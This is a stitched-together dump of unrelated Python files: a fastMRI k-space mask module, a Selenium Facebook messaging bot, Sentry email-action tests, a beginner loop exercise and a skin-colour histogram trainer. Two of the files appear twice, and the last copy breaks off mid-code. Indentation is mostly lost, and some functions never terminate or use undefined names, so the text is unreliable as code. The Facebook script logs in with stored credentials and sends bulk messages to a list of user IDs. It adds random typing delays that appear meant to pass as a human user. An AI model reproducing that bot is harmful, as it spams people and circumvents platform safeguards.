skip_low_freqs: bool,
) -> MaskFunc:
"""
Creates a mask of the specified type.
    Args:
        mask_type_str: Name of the mask type; one of "random" or
            "adaptive_equispaced_fraction".
        center_fractions: What fraction of the center of k-space to include.
accelerations: What accelerations to apply.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should be.
Set this `True` to guarantee the same number of sampled lines for
all masks with a given (acceleration, center_fraction) setting.
Returns:
A mask func for the target mask type.
"""
if mask_type_str == "random":
return RandomMaskFunc(center_fractions, accelerations)
elif mask_type_str == "adaptive_equispaced_fraction":
return EquispacedMaskFractionFunc(
center_fractions, accelerations, skip_low_freqs
)
else:
raise ValueError(f"{mask_type_str} not supported")
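# Hedged usage sketch (parameter values are illustrative):
#
#   mask_func = create_mask_for_mask_type(
#       "adaptive_equispaced_fraction",
#       center_fractions=[0.08],
#       accelerations=[4],
#       skip_low_freqs=True,
#   )
#
# The returned MaskFunc can then be handed to the fastMRI data pipeline in the
# usual way (e.g. as the mask function argument of a data transform).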
class EquispacedMaskFractionFunc(MaskFunc):
"""
Equispaced mask with strictly exact acceleration matching.
The mask selects a subset of columns from the input k-space data. If the
k-space data has N columns, the mask picks out:
1. N_low_freqs = (N * center_fraction) columns in the center
corresponding to low-frequencies.
2. The other columns are selected with equal spacing at a proportion
that reaches the desired acceleration rate taking into consideration
the number of low frequencies. This ensures that the expected number
of columns selected is equal to (N / acceleration)
It is possible to use multiple center_fractions and accelerations, in which
case one possible (center_fraction, acceleration) is chosen uniformly at
    random each time the EquispacedMaskFractionFunc object is called.
Note that this function may not give equispaced samples (documented in
https://github.com/facebookresearch/fastMRI/issues/54), which will require
modifications to standard GRAPPA approaches. Nonetheless, this aspect of
the function has been preserved to match the public multicoil data.
"""
def __init__(
self,
center_fractions: Sequence[float],
accelerations: Sequence[int],
skip_low_freqs: bool = False,
):
"""
Args:
center_fractions: Fraction of low-frequency columns to be retained.
If multiple values are provided, then one of these numbers is
chosen uniformly each time.
accelerations: Amount of under-sampling. This should have the same
length as center_fractions. If multiple values are provided,
then one of these is chosen uniformly each time.
skip_low_freqs: Whether to skip already sampled low-frequency lines
for the purposes of determining where equispaced lines should
be. Set this `True` to guarantee the same number of sampled
lines for all masks with a given (acceleration,
center_fraction) setting.
"""
super().__init__(center_fractions, accelerations)
self.skip_low_freqs = skip_low_freqs
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Number of low frequencies. Used to adjust mask
to exactly match the target acceleration.
Returns:
A mask for the high spatial frequencies of k-space.
"""
mask = np.zeros(num_cols)
pad = (num_cols - num_low_frequencies + 1) // 2
# determine acceleration rate by adjusting for the number of low frequencies
adjusted_accel = (acceleration * (num_low_frequencies - num_cols)) / (
num_low_frequencies * acceleration - num_cols
)
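        # Worked example (illustrative numbers): with num_cols=372, acceleration=4
        # and num_low_frequencies=30, adjusted_accel = 4 * (30 - 372) / (30 * 4 - 372)
        # ≈ 5.43, so the non-central lines are sampled more sparsely than 1-in-4 and
        # the low-frequency block plus the equispaced lines together reach the
        # target of 372 / 4 = 93 sampled columns.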
offset = self.rng.randint(0, round(adjusted_accel) - 1)
# Select samples from the remaining columns
accel_samples = np.arange(
offset, num_cols - num_low_frequencies - 1, adjusted_accel
)
accel_samples = np.around(accel_samples).astype(int)
skip = (
num_low_frequencies # Skip low freq AND optionally lines right next to it
)
for sample in accel_samples:
if sample < pad:
mask[sample] = True
else: # sample is further than center, so skip low_freqs
mask[int(sample + skip)] = True
        return mask | fastmri_examples/adaptive_varnet/subsample.py | 0.980243 | 0.831554
from selenium import webdriver
from keyboard import press
from selenium.webdriver.common.keys import Keys
import time
import pandas as pd
import keyboard
import random
pause_pt = False # set pause value to false
def pause_func(): #function to stop loop
global pause_pt
pause_pt = True #set pause value to true
data = pd.read_csv("ids.csv",names=['B']) #reading the csv file which contains the facebook ids(B column)
ids_targets= data.B.tolist() #alternatively you can make a list of targets = [18882121112,12232442423..]
print(ids_targets)
x = "facebook_email"
y = "facebook_password"
driver = webdriver.Chrome()
driver.get('https://www.facebook.com/')
email = driver.find_element_by_css_selector("input[name=email]")
email.send_keys(x)
password = driver.find_element_by_css_selector("input[name=pass]")
password.send_keys(y)
login_button = driver.find_element_by_css_selector("input[type=submit]")
login_button.click()
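# Note (assumption about the environment): the find_element_by_* helpers used in
# this script come from the Selenium 3 API and are no longer available in Selenium 4.
# A modern equivalent for the lookups above would look like:
#     from selenium.webdriver.common.by import By
#     email = driver.find_element(By.CSS_SELECTOR, "input[name=email]")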
id_dom = ["js_f","js_g","js_h","js_i",
"js_j", "js_k","js_l","js_m","js_n","js_o","js_p","js_q","js_r",
"js_s","js_t","js_u","js_v","js_w","js_x","js_y","js_z","js_a","js_b","js_c","js_d","js_e","js_1","js_2","js_3",
"js_4","js_5","js_6","js_7","js_8","js_9","js_10","js_0",
] # list of ids to iterate
# id of message box in messenger changes over requests
number = 1
text = "your message"
keyboard.add_hotkey("ctrl+alt", pause_func) #register once: pressing "ctrl+alt" calls pause_func and stops the loop
for id_target in list(ids_targets): #iterate over a copy so removing sent ids below doesn't skip targets
    msg_url = 'https://www.facebook.com/messages/t/' + str(id_target)
    if pause_pt == True: #it will break the loop
        break
try:
driver.get(msg_url)
driver.implicitly_wait(5)
msg = driver.find_element_by_css_selector('div._kmc._7kpg.navigationFocus') #finding the element of msg_box of class "_kmc _7kpg navigationFocus"
for id_logic in id_dom: #iterating over ids of the msg_box since it changes everytime / most of the time
try:
msg_text = msg.find_element_by_id(id_logic) #finding the element of the msg
for letters in text:
msg_text.send_keys(letters) #sending each letter of the target msg
time.sleep(random.uniform(0.1, 0.3)) #sending each letter at a time span to slow down the speed of typing
msg_text.send_keys(Keys.ENTER)
ids_targets.remove(id_target) #remove the id if msg is sent
print("msg sent to\t",id_target)
break
            except Exception:
                print("error with\t",id_logic)
    except Exception:
        print("Skipping")
print(number,"-----------------------------------------Msg_automate_kaux---------------------------------------------")
number+=1
time.sleep(random.uniform(3.2,4.5)) #sleeping after sending a msg
pd.DataFrame(ids_targets).to_csv("ids.csv",mode='w') #saving the remaining facebook_ids | msg_automation.py | 0.165762 | 0.056288
from __future__ import absolute_import
import six
from django.core import mail
from sentry.mail.actions import ActionTargetType, NotifyEmailAction, NotifyEmailForm
from sentry.models import OrganizationMember, OrganizationMemberTeam, Rule
from sentry.testutils import TestCase
from sentry.testutils.cases import RuleTestCase
from sentry.tasks.post_process import post_process_group
from sentry.testutils.helpers.datetime import iso_format, before_now
class NotifyEmailFormTest(TestCase):
TARGET_TYPE_KEY = "targetType"
TARGET_IDENTIFIER_KEY = "targetIdentifier"
def setUp(self):
super(NotifyEmailFormTest, self).setUp()
self.user = self.create_user(email="<EMAIL>", is_active=True)
self.user2 = self.create_user(email="<EMAIL>", is_active=True)
self.inactive_user = self.create_user(email="<EMAIL>", is_active=False)
organization = self.create_organization(owner=self.user)
self.team = self.create_team(organization=organization)
self.team_not_in_project = self.create_team(organization=organization)
self.project = self.create_project(name="Test", teams=[self.team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=self.user, organization=organization
),
team=self.team,
)
self.create_member(user=self.user2, organization=organization, teams=[self.team])
self.create_member(
user=self.inactive_user,
organization=organization,
teams=[self.team, self.team_not_in_project],
)
def form_from_json(self, json):
return NotifyEmailForm(self.project, json)
def form_from_values(self, target_type_value, target_id=None):
json = {self.TARGET_TYPE_KEY: target_type_value}
if target_id:
json[self.TARGET_IDENTIFIER_KEY] = target_id
return self.form_from_json(json)
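    # Illustrative payload shape built by the helpers above (identifiers are
    # placeholders): {"targetType": ActionTargetType.MEMBER.value,
    # "targetIdentifier": some_user.id}; issue-owner notifications only need
    # {"targetType": ActionTargetType.ISSUE_OWNERS.value}.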
def test_validate_empty_fail(self):
form = self.form_from_json({})
assert not form.is_valid()
def test_validate_none_fail(self):
form = self.form_from_json(None)
assert not form.is_valid()
def test_validate_malformed_json_fail(self):
form = self.form_from_json({"notTheRightK3yName": ActionTargetType.ISSUE_OWNERS.value})
assert not form.is_valid()
def test_validate_invalid_target_type_fail(self):
form = self.form_from_values("TheLegend27")
assert not form.is_valid()
def test_validate_issue_owners(self):
form = self.form_from_values(ActionTargetType.ISSUE_OWNERS.value)
assert form.is_valid()
def test_validate_team(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team.id)
assert form.is_valid()
def test_validate_team_not_in_project_fail(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team_not_in_project.id)
assert not form.is_valid()
def test_validate_user(self):
for u in [self.user, self.user2]:
form = self.form_from_values(ActionTargetType.MEMBER.value, u.id)
assert form.is_valid()
def test_validate_inactive_user_fail(self):
form = self.form_from_values(ActionTargetType.MEMBER.value, self.inactive_user)
assert not form.is_valid()
def test_none_target_identifier(self):
json = {self.TARGET_TYPE_KEY: ActionTargetType.ISSUE_OWNERS.value}
json[self.TARGET_IDENTIFIER_KEY] = "None"
form = self.form_from_json(json)
assert form.is_valid()
class NotifyEmailTest(RuleTestCase):
rule_cls = NotifyEmailAction
def test_simple(self):
event = self.get_event()
rule = self.get_rule()
results = list(rule.after(event=event, state=self.get_state()))
assert len(results) == 1
def test_full_integration(self):
one_min_ago = iso_format(before_now(minutes=1))
event = self.store_event(
data={
"message": "hello",
"exception": {"type": "Foo", "value": "uh oh"},
"level": "error",
"timestamp": one_min_ago,
},
project_id=self.project.id,
assert_no_errors=False,
)
action_data = {
"id": "sentry.mail.actions.NotifyEmailAction",
"targetType": "Member",
"targetIdentifier": six.text_type(self.user.id),
}
condition_data = {"id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition"}
Rule.objects.filter(project=event.project).delete()
Rule.objects.create(
project=event.project, data={"conditions": [condition_data], "actions": [action_data]}
)
with self.tasks():
post_process_group(
event=event, is_new=True, is_regression=False, is_new_group_environment=False
)
assert len(mail.outbox) == 1
sent = mail.outbox[0]
assert sent.to == [self.user.email]
assert "uh oh" in sent.subject | tests/sentry/mail/test_actions.py | from __future__ import absolute_import
import six
from django.core import mail
from sentry.mail.actions import ActionTargetType, NotifyEmailAction, NotifyEmailForm
from sentry.models import OrganizationMember, OrganizationMemberTeam, Rule
from sentry.testutils import TestCase
from sentry.testutils.cases import RuleTestCase
from sentry.tasks.post_process import post_process_group
from sentry.testutils.helpers.datetime import iso_format, before_now
class NotifyEmailFormTest(TestCase):
TARGET_TYPE_KEY = "targetType"
TARGET_IDENTIFIER_KEY = "targetIdentifier"
def setUp(self):
super(NotifyEmailFormTest, self).setUp()
self.user = self.create_user(email="<EMAIL>", is_active=True)
self.user2 = self.create_user(email="<EMAIL>", is_active=True)
self.inactive_user = self.create_user(email="<EMAIL>", is_active=False)
organization = self.create_organization(owner=self.user)
self.team = self.create_team(organization=organization)
self.team_not_in_project = self.create_team(organization=organization)
self.project = self.create_project(name="Test", teams=[self.team])
OrganizationMemberTeam.objects.create(
organizationmember=OrganizationMember.objects.get(
user=self.user, organization=organization
),
team=self.team,
)
self.create_member(user=self.user2, organization=organization, teams=[self.team])
self.create_member(
user=self.inactive_user,
organization=organization,
teams=[self.team, self.team_not_in_project],
)
def form_from_json(self, json):
return NotifyEmailForm(self.project, json)
def form_from_values(self, target_type_value, target_id=None):
json = {self.TARGET_TYPE_KEY: target_type_value}
if target_id:
json[self.TARGET_IDENTIFIER_KEY] = target_id
return self.form_from_json(json)
def test_validate_empty_fail(self):
form = self.form_from_json({})
assert not form.is_valid()
def test_validate_none_fail(self):
form = self.form_from_json(None)
assert not form.is_valid()
def test_validate_malformed_json_fail(self):
form = self.form_from_json({"notTheRightK3yName": ActionTargetType.ISSUE_OWNERS.value})
assert not form.is_valid()
def test_validate_invalid_target_type_fail(self):
form = self.form_from_values("TheLegend27")
assert not form.is_valid()
def test_validate_issue_owners(self):
form = self.form_from_values(ActionTargetType.ISSUE_OWNERS.value)
assert form.is_valid()
def test_validate_team(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team.id)
assert form.is_valid()
def test_validate_team_not_in_project_fail(self):
form = self.form_from_values(ActionTargetType.TEAM.value, self.team_not_in_project.id)
assert not form.is_valid()
def test_validate_user(self):
for u in [self.user, self.user2]:
form = self.form_from_values(ActionTargetType.MEMBER.value, u.id)
assert form.is_valid()
def test_validate_inactive_user_fail(self):
form = self.form_from_values(ActionTargetType.MEMBER.value, self.inactive_user)
assert not form.is_valid()
def test_none_target_identifier(self):
json = {self.TARGET_TYPE_KEY: ActionTargetType.ISSUE_OWNERS.value}
json[self.TARGET_IDENTIFIER_KEY] = "None"
form = self.form_from_json(json)
assert form.is_valid()
class NotifyEmailTest(RuleTestCase):
rule_cls = NotifyEmailAction
def test_simple(self):
event = self.get_event()
rule = self.get_rule()
results = list(rule.after(event=event, state=self.get_state()))
assert len(results) == 1
def test_full_integration(self):
one_min_ago = iso_format(before_now(minutes=1))
event = self.store_event(
data={
"message": "hello",
"exception": {"type": "Foo", "value": "uh oh"},
"level": "error",
"timestamp": one_min_ago,
},
project_id=self.project.id,
assert_no_errors=False,
)
action_data = {
"id": "sentry.mail.actions.NotifyEmailAction",
"targetType": "Member",
"targetIdentifier": six.text_type(self.user.id),
}
condition_data = {"id": "sentry.rules.conditions.first_seen_event.FirstSeenEventCondition"}
Rule.objects.filter(project=event.project).delete()
Rule.objects.create(
project=event.project, data={"conditions": [condition_data], "actions": [action_data]}
)
with self.tasks():
post_process_group(
event=event, is_new=True, is_regression=False, is_new_group_environment=False
)
assert len(mail.outbox) == 1
sent = mail.outbox[0]
assert sent.to == [self.user.email]
assert "uh oh" in sent.subject | 0.44071 | 0.275501 |
# template for calling functions in another file
def print_function():
print("I'm in another file :)")
def while_loop(max_number=10):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
print(my_list)
def while_loop2(neg_number):
my_list1 = []
i = 1
while i >= neg_number:
my_list1.append(i)
i -= 1
print(my_list1)
def while_loop3(max_number):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i -= 1
accum = 0
for w in my_list:
accum = accum + w
my_list.append(accum)
print(my_list)
def while_loop4(max_number):
    my_list = []
    i = 1
    while i <= max_number:
        my_list.append(i)
        i -= 1
    accum = 0
    for w in my_list:
        accum = accum + w
        if i < -12 or i > 12:
            break
    my_list.append(accum)
    print(my_list)
'''def while_loop5(max_number, even):
my_list = []
i = 1
while i <= max_number:
my_list.append(i)
i += 1
accum = 0
for w in my_list:
accum = accum + w
if i < -12 or i > 12:
break
elif i % 2 == 0:
i += 1
continue
my_list.append(accum)
print(my_list)
'''
def while_loop5(max_number=10, even=False):
my_list = []
accum = 0
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
print(my_list)
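# Example call (illustrative): while_loop5(6, even=True) collects [2, 4, 6], then
# appends the running sum and prints [2, 4, 6, 12].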
def while_loop6(max_number=10, even=False, boolean="False"):
my_list = []
accum = 0
factorial = 1
i = 1
if max_number < 0:
while i >= max_number:
if even and i % 2 == 1:
i -= 1
continue
my_list.append(i)
accum -= i
i -= 1
if i < -12:
break
elif max_number > 0:
while i <= max_number:
my_list = my_list + [i]
factorial = factorial * i
accum += i
i += 1
if i > 12:
break
else:
while i <= max_number:
if even and i % 2 == 1:
i += 1
continue
my_list.append(i)
accum += i
i += 1
if i > 12:
break
my_list.append(accum)
my_list.append(factorial)
    print(my_list) | Lab5/functions.py | 0.134037 | 0.182044
import logging
import os
import sys
try:
import cPickle as pickle
except ImportError: # Python 3.x
import pickle
import colorlog
import numpy as np
from PIL import Image
logger = logging.getLogger()
logger.setLevel(colorlog.colorlog.logging.INFO)
handler = colorlog.StreamHandler()
handler.setFormatter(colorlog.ColoredFormatter())
logger.addHandler(handler)
# logger.debug("Debug message")
# logger.info("Information message")
# logger.warning("Warning message")
# logger.error("Error message")
# logger.critical("Critical message")
np.set_printoptions(threshold=sys.maxsize)
np.set_printoptions(linewidth=10000)
script_dir = os.path.dirname(__file__)
training_data_dir = os.path.join(
script_dir, "histogram_training_images", "sfa", "SKIN", "5"
)
# training_data_dir = os.path.join(script_dir,
# "histogram_training_images",
# "sfa_small_test")
hist_output_dir = os.path.join(script_dir, "histogram_data")
def img2hists(img_path, hist_rgb=None, hist_hsv=None, total_pixels=0):
    """Given a path to an image file, return the number of pixels in it, and two
    dictionaries, containing the histogram data of the image as an RGB
    file and an HSV file respectively.
    By default it gives dictionaries for just the current image, but if
    you want to collect information for a sequence of images you can pass
    it non-empty dictionaries for hist_rgb and hist_hsv."""
    # Use None defaults so repeated calls don't silently accumulate into shared
    # dictionary objects.
    if hist_rgb is None:
        hist_rgb = {}
    if hist_hsv is None:
        hist_hsv = {}
    image_array_rgb = np.array(Image.open(img_path).convert("RGB"))
    image_array_hsv = np.array(Image.open(img_path).convert("HSV"))
total_pixels += image_array_rgb.shape[0] * image_array_rgb.shape[1]
for i in range(0, image_array_rgb.shape[0]):
for j in range(0, image_array_rgb.shape[1]):
rgb = (
image_array_rgb[i, j, 0],
image_array_rgb[i, j, 1],
image_array_rgb[i, j, 2],
)
hsv = (
image_array_hsv[i, j, 0],
image_array_hsv[i, j, 1],
image_array_hsv[i, j, 2],
)
if rgb in hist_rgb:
hist_rgb[rgb] += 1
else:
hist_rgb[rgb] = 1
if hsv in hist_hsv:
hist_hsv[hsv] += 1
else:
hist_hsv[hsv] = 1
return (total_pixels, hist_rgb, hist_hsv)
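# Illustrative accumulation sketch (file names are placeholders): threading the
# same dictionaries through successive calls builds one cumulative histogram.
#     total, rgb_hist, hsv_hist = 0, {}, {}
#     for path in ["skin1.jpg", "skin2.jpg"]:
#         total, rgb_hist, hsv_hist = img2hists(path, rgb_hist, hsv_hist, total)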
def slice_hist(hist):
hist_xy = dict()
hist_xz = dict()
hist_yz = dict()
for key in hist.keys():
if (key[0], key[1]) in hist_xy:
hist_xy[(key[0], key[1])] += hist[key]
else:
hist_xy[(key[0], key[1])] = hist[key]
if (key[0], key[2]) in hist_xz:
hist_xz[(key[0], key[2])] += hist[key]
else:
hist_xz[(key[0], key[2])] = hist[key]
if (key[1], key[2]) in hist_yz:
hist_yz[(key[1], key[2])] += hist[key]
else:
hist_yz[(key[1], key[2])] = hist[key]
logger.debug("XY hist created - {}".format(hist_xy))
logger.debug("XZ hist created - {}".format(hist_xz))
logger.debug("YZ hist created - {}".format(hist_yz))
return (hist_xy, hist_xz, hist_yz)
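# Illustrative example of the slicing above on a tiny 3-tuple histogram:
#     slice_hist({(1, 2, 3): 4, (1, 2, 9): 6})
#     -> ({(1, 2): 10}, {(1, 3): 4, (1, 9): 6}, {(2, 3): 4, (2, 9): 6})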
if __name__ == "__main__":
# Change this if you want more or fewer logging messages.
logger.info("<NAME> - EECS 332, MP 4 - Histogram training module")
logger.info("-" * 80)
big_total_pixels = 0
big_hist_rgb = {}
big_hist_hsv = {}
logger.warning(
"Constructing un-normalized histograms for directory (this might take a while): {}".format(
training_data_dir
)
)
for path, subdirs, files in os.walk(training_data_dir):
for name in files:
img = os.path.join(path, name)
logger.debug("Now analyzing {}".format(img))
logger.debug("Constructing individual for {}".format(img))
(img_total_pixels, img_hist_rgb, img_hist_hsv) = img2hists(img)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total pixels :: {}".format(img_total_pixels))
logger.debug("RGB individual histogram dict :: {}".format(img_hist_rgb))
logger.debug("HSV individual histogram dict :: {}".format(img_hist_hsv))
logger.debug("Adding to cumulative histogram data for {}".format(img))
(big_total_pixels, big_hist_rgb, big_hist_hsv) = img2hists(
img, big_hist_rgb, big_hist_hsv, big_total_pixels
)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total cumulative pixels :: {}".format(big_total_pixels))
logger.debug("RGB cumulative histogram dict :: {}".format(big_hist_rgb))
logger.debug("HSV cumulative histogram dict :: {}".format(big_hist_hsv))
logger.debug(" -> File competed: {}".format(img))
logger.info(
"Non-normalized histograms have been constructed for directory: {}".format(
training_data_dir
)
)
logger.info("Constructiong 2-tuple slices of RGB and HSV hists.")
(big_hist_rg, big_hist_rb, big_hist_gb) = slice_hist(big_hist_rgb)
(big_hist_hs, big_hist_hv, big_hist_sv) = slice_hist(big_hist_hsv)
rgb_count_check = 0
for key in big_hist_rgb.keys():
rgb_count_check += big_hist_rgb[key]
rg_count_check = 0
for key in big_hist_rg.keys():
rg_count_check += big_hist_rg[key]
rb_count_check = 0
for key in big_hist_rb.keys():
rb_count_check += big_hist_rb[key]
gb_count_check = 0
for key in big_hist_gb.keys():
gb_count_check += big_hist_gb[key]
hs_count_check = 0
for key in big_hist_hs.keys():
hs_count_check += big_hist_hs[key]
hv_count_check = 0
for key in big_hist_hv.keys():
hv_count_check += big_hist_hv[key]
sv_count_check = 0
for key in big_hist_sv.keys():
sv_count_check += big_hist_sv[key]
hsv_count_check = 0
for key in big_hist_hsv.keys():
hsv_count_check += big_hist_hsv[key]
try:
if (
rgb_count_check != hsv_count_check
or rgb_count_check != big_total_pixels
or hsv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("Histogram counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rgb_count_check = {}".format(rgb_count_check))
logger.warning(" -> hsv_count_check = {}".format(hsv_count_check))
try:
if (
hs_count_check != big_total_pixels
or hv_count_check != big_total_pixels
or sv_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("HSV 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> hv_count_check = {}".format(hv_count_check))
logger.warning(" -> hs_count_check = {}".format(hs_count_check))
logger.warning(" -> sv_count_check = {}".format(sv_count_check))
try:
if (
rb_count_check != big_total_pixels
or rg_count_check != big_total_pixels
or gb_count_check != big_total_pixels
):
raise ValueError
except ValueError:
logger.warning("RGB 2-tuple slice counts don't match up!")
logger.warning(" -> big_total_pixels = {}".format(big_total_pixels))
logger.warning(" -> rg_count_check = {}".format(rg_count_check))
logger.warning(" -> rb_count_check = {}".format(rb_count_check))
logger.warning(" -> gb_count_check = {}".format(gb_count_check))
logger.info("Pickling non-normalized histogram dicts with 'size' key added.")
big_hist_rgb["size"] = big_total_pixels
big_hist_hsv["size"] = big_total_pixels
big_hist_rg["size"] = big_total_pixels
big_hist_rb["size"] = big_total_pixels
big_hist_gb["size"] = big_total_pixels
big_hist_hs["size"] = big_total_pixels
big_hist_hv["size"] = big_total_pixels
big_hist_sv["size"] = big_total_pixels
rgb_hist_location = os.path.join(hist_output_dir, "hist_rgb.pickle")
hsv_hist_location = os.path.join(hist_output_dir, "hist_hsv.pickle")
rg_hist_location = os.path.join(hist_output_dir, "hist_rg.pickle")
rb_hist_location = os.path.join(hist_output_dir, "hist_rb.pickle")
gb_hist_location = os.path.join(hist_output_dir, "hist_gb.pickle")
hs_hist_location = os.path.join(hist_output_dir, "hist_hs.pickle")
hv_hist_location = os.path.join(hist_output_dir, "hist_hv.pickle")
sv_hist_location = os.path.join(hist_output_dir, "hist_sv.pickle")
with open(rgb_hist_location, "wb") as fp:
pickle.dump(big_hist_rgb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rgb pickled to {}".format(fp))
with open(hsv_hist_location, "wb") as fp:
pickle.dump(big_hist_hsv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hsv pickled to {}".format(fp))
with open(rg_hist_location, "wb") as fp:
pickle.dump(big_hist_rg, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rg pickled to {}".format(fp))
with open(rb_hist_location, "wb") as fp:
pickle.dump(big_hist_rb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_rb pickled to {}".format(fp))
with open(gb_hist_location, "wb") as fp:
pickle.dump(big_hist_gb, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_gb pickled to {}".format(fp))
with open(hs_hist_location, "wb") as fp:
pickle.dump(big_hist_hs, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hs pickled to {}".format(fp))
with open(hv_hist_location, "wb") as fp:
pickle.dump(big_hist_hv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_hv pickled to {}".format(fp))
with open(sv_hist_location, "wb") as fp:
pickle.dump(big_hist_sv, fp, protocol=pickle.HIGHEST_PROTOCOL)
logger.info("big_hist_sv pickled to {}".format(fp))
logger.info("Histogram data for RGB and HSV has been pickled.")
logger.warning("Removing 'size' key from histograms.")
del big_hist_rgb["size"]
del big_hist_hsv["size"]
del big_hist_rg["size"]
del big_hist_rb["size"]
del big_hist_gb["size"]
del big_hist_hs["size"]
del big_hist_hv["size"]
del big_hist_sv["size"] | MP4/mp4_histogram_training.py |
import logging
import os
import sys
try:
import cPickle as pickle
except ImportError: # Python 3.x
import pickle
import colorlog
import numpy as np
from PIL import Image
logger = logging.getLogger()
logger.setLevel(colorlog.colorlog.logging.INFO)
handler = colorlog.StreamHandler()
handler.setFormatter(colorlog.ColoredFormatter())
logger.addHandler(handler)
# logger.debug("Debug message")
# logger.info("Information message")
# logger.warning("Warning message")
# logger.error("Error message")
# logger.critical("Critical message")
np.set_printoptions(threshold=sys.maxsize)
np.set_printoptions(linewidth=10000)
script_dir = os.path.dirname(__file__)
training_data_dir = os.path.join(
script_dir, "histogram_training_images", "sfa", "SKIN", "5"
)
# training_data_dir = os.path.join(script_dir,
# "histogram_training_images",
# "sfa_small_test")
hist_output_dir = os.path.join(script_dir, "histogram_data")
def img2hists(img_path, hist_rgb={}, hist_hsv={}, total_pixels=0):
"""Given a Pillow image, return the number of pixels in it, and two
dictionaries, containing the histogram data of the image as an RGB
file and an HSV file respectively.
By default it gives dictionaries for just the current image, but if
you want to collect information for a sequence of images you can pass
it non-empty dictionaries for hist_rgb and hist_hsv."""
image_array_rgb = np.array(Image.open(img).convert("RGB"))
image_array_hsv = np.array(Image.open(img).convert("HSV"))
total_pixels += image_array_rgb.shape[0] * image_array_rgb.shape[1]
for i in range(0, image_array_rgb.shape[0]):
for j in range(0, image_array_rgb.shape[1]):
rgb = (
image_array_rgb[i, j, 0],
image_array_rgb[i, j, 1],
image_array_rgb[i, j, 2],
)
hsv = (
image_array_hsv[i, j, 0],
image_array_hsv[i, j, 1],
image_array_hsv[i, j, 2],
)
if rgb in hist_rgb:
hist_rgb[rgb] += 1
else:
hist_rgb[rgb] = 1
if hsv in hist_hsv:
hist_hsv[hsv] += 1
else:
hist_hsv[hsv] = 1
return (total_pixels, hist_rgb, hist_hsv)
def slice_hist(hist):
hist_xy = dict()
hist_xz = dict()
hist_yz = dict()
for key in hist.keys():
if (key[0], key[1]) in hist_xy:
hist_xy[(key[0], key[1])] += hist[key]
else:
hist_xy[(key[0], key[1])] = hist[key]
if (key[0], key[2]) in hist_xz:
hist_xz[(key[0], key[2])] += hist[key]
else:
hist_xz[(key[0], key[2])] = hist[key]
if (key[1], key[2]) in hist_yz:
hist_yz[(key[1], key[2])] += hist[key]
else:
hist_yz[(key[1], key[2])] = hist[key]
logger.debug("XY hist created - {}".format(hist_xy))
logger.debug("XZ hist created - {}".format(hist_xz))
logger.debug("YZ hist created - {}".format(hist_yz))
return (hist_xy, hist_xz, hist_yz)
if __name__ == "__main__":
# Change this if you want more or fewer logging messages.
logger.info("<NAME> - EECS 332, MP 4 - Histogram training module")
logger.info("-" * 80)
big_total_pixels = 0
big_hist_rgb = {}
big_hist_hsv = {}
logger.warning(
"Constructing un-normalized histograms for directory (this might take a while): {}".format(
training_data_dir
)
)
for path, subdirs, files in os.walk(training_data_dir):
for name in files:
img = os.path.join(path, name)
logger.debug("Now analyzing {}".format(img))
logger.debug("Constructing individual for {}".format(img))
(img_total_pixels, img_hist_rgb, img_hist_hsv) = img2hists(img)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total pixels :: {}".format(img_total_pixels))
logger.debug("RGB individual histogram dict :: {}".format(img_hist_rgb))
logger.debug("HSV individual histogram dict :: {}".format(img_hist_hsv))
logger.debug("Adding to cumulative histogram data for {}".format(img))
(big_total_pixels, big_hist_rgb, big_hist_hsv) = img2hists(
img, big_hist_rgb, big_hist_hsv, big_total_pixels
)
logger.debug("Histogram construction complete for {}".format(img))
logger.debug("Total cumulative pixels :: {}".format(big_total_pixels))
logger.debug("RGB cumulative histogram dict :: {}".format(big_hist_rgb))
logger.debug("HSV cumulative histogram dict :: {}".format(big_hist_hsv))
logger.debug(" -> File competed: {}".format(img))
logger.info(
"Non-normalized histograms have been constructed for directory: {}".format(
training_data_dir
)
)
logger.info("Constructiong 2-tuple slices of RGB and HSV hists.")
(big_hist_rg, big_hist_rb, big_hist_gb) = slice_hist(big_hist_rgb)
(big_hist_hs, big_hist_hv, big_hist_sv) = slice_hist(big_hist_hsv)
rgb_count_check = 0
for key in big_hist_rgb.keys():
rgb_count_check += big_hist_rgb[key]
rg_count_check = 0
for key in big_hist_rg.keys():
rg_count_check += big_hist_rg[key]
rb_count_check = 0
for key in big_hist_rb.keys():
rb_count_check += big_hist_rb[key]
gb_count_check = 0
for key in big_hist_gb.keys():
gb_count_check += big_hist_gb[key]
hs_count_check = 0
for key in big_hist_hs.keys():
hs_count_check += big_hist_hs[key]
hv_count_check = 0
for key in big_hist_hv.keys():
